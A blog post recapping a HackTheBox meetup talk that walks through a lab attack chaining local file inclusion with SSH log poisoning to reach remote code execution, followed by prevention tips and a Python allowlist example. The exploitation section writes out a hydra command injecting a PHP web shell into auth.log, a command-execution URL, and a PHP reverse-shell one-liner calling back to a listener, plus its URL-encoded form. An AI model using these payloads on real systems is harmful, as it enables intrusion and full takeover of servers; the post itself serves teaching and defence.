HackTheBox Meetup - LFI2RCE
How to Achieve Remote Code Execution through LFI and Log Poisoning?
On November 29, 2024, I had the incredible opportunity to speak at the first HackTheBox Meetup event in Brussels, organized by Mohamed Waked Nachar. During my talk, I highlighted a critical vulnerability that can be exploited to compromise an entire system if it's susceptible to LFI (Local File Inclusion) and log file poisoning attacks.
Here's a detailed look at how an attacker can achieve Remote Code Execution (RCE) through LFI via log poisoning. For more details, you can also download the PowerPoint presentation attached to this post and watch the video added below.
Enumeration Phase
Identify Live Hosts on the Network:
sudo arp-scan -l
Identify Ports and Services:
nmap -A 192.168.17.132 -p- -oX lfi.xml
Create a Structured HTML Nmap Report:
xsltproc -o lfi.html lfi.xml
Vulnerability Scanning Phase
Identify Web Directories and Files:
dirb http://192.168.17.132/ wordlist.txt
Identify the Vulnerable Parameter (fuzz the parameter name and only report responses that contain the first line of /etc/passwd, so a real inclusion stands out from the normal page):
ffuf -w wordlist.txt -u 'http://192.168.17.132/antibot_image/antibots/info.php?FUZZ=/etc/passwd' -mr 'root:x:0:0'
Exploitation Phase
Poison the SSH Log File (one failed login against the SSH service on port 2211 makes sshd write the attempted username verbatim into /var/log/auth.log as an "Invalid user ..." entry; the PHP tag is single-quoted for the shell, so the array key uses double quotes):
hydra -l '<?php system($_GET["commande"]); ?>' -p test -s 2211 192.168.17.132 ssh
This only works if the web server process can read the log: on a default Debian or Ubuntu install /var/log/auth.log is owned by root:adm with mode 640, so the lab target has to have relaxed that.
Include the Poisoned Log File via LFI and Execute a Command (the output of ls appears inline at the spot where the poisoned log entry is rendered):
http://192.168.17.132/antibot_image/antibots/info.php?image=/var/log/auth.log&commande=ls
Obtain a Reverse Shell via LFI (LFI to RCE). The command to run on the target is:
php -r '$sock=fsockopen("192.168.17.130",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
It cannot be pasted into the query string as-is: every & in it would be parsed as a parameter separator and the server would only ever see the command up to the first one. URL-encode the value (& becomes %26, space becomes %20, and so on), start a listener on 192.168.17.130 port 1234 (netcat is enough), then request:
http://192.168.17.132/antibot_image/antibots/info.php?image=/var/log/auth.log&commande=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.17.130%22%2C1234%29%3Bexec%28%22/bin/sh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
Prevention Tips
Validate User Input: never hand a user-supplied value to include() or to a file-opening function as a path; treat the image parameter as a key to look up, not as a file name.
Sanitize User Input: stripping characters is a weak second layer, not a fix; a filter that removes ../ once is bypassed by ....//, and it does nothing against an absolute path such as /var/log/auth.log.
Use Whitelists: keep a fixed list (or map) of the files the page is allowed to include and reject everything else; in PHP, open_basedir adds a server-side limit on which directories the interpreter may open at all.
Principle of Least Privilege: run the web server as an account that can read only what the site needs; if www-data cannot read /var/log/auth.log (the Debian default, root:adm with mode 640), this whole chain stops at the inclusion step.
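The validation and whitelist tips above, shown as code. This is an added example, not the talk's code and not the target's info.php (which is not on the page): the vulnerable function is the generic include($_GET['image']) pattern this class of bug comes from, the middle function shows why stripping ../ is not a fix, and the last one is the allowlist version. The base directory and the allowlist entries are assumptions.

```python
"""
Three ways to turn the 'image' parameter into a file path (added example; the
base directory and allowlist entries are assumptions, not the target's layout).
"""
import os
from typing import Optional

IMAGE_DIR = "/srv/www/antibot_image/antibots/images"  # assumed location of the real images


def vulnerable_resolve(user_value: str) -> str:
    """include($_GET['image']) in PHP terms: the caller controls the whole
    path, so /var/log/auth.log is as valid an 'image' as logo.png."""
    return user_value


def denylist_resolve(user_value: str, base: str = IMAGE_DIR) -> str:
    """'Sanitise' by stripping ../ once. Each '....//' loses one '../' and what
    is left is '../' again, so the traversal survives the filter."""
    cleaned = user_value.replace("../", "")
    return os.path.normpath(os.path.join(base, cleaned))


# Allowlist: the parameter is a key into this table, never a path fragment.
ALLOWED_IMAGES = {
    "logo": "logo.png",
    "captcha": "captcha.png",
}


def allowlist_resolve(user_value: str, base: str = IMAGE_DIR) -> Optional[str]:
    """Return the file to include, or None (the handler should answer 404).
    The realpath containment check is a second layer for the day someone adds
    an entry like '../../config.php' to the table."""
    filename = ALLOWED_IMAGES.get(user_value)
    if filename is None:
        return None
    root = os.path.realpath(base)
    path = os.path.realpath(os.path.join(root, filename))
    if os.path.commonpath([root, path]) != root:
        return None
    return path
```

With the allowlist in place the log-poisoning step is irrelevant: no value of the image parameter ever reaches the filesystem except the two names in the table, and even those are checked to resolve inside the image directory.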
The demo of this attack is attached to this post.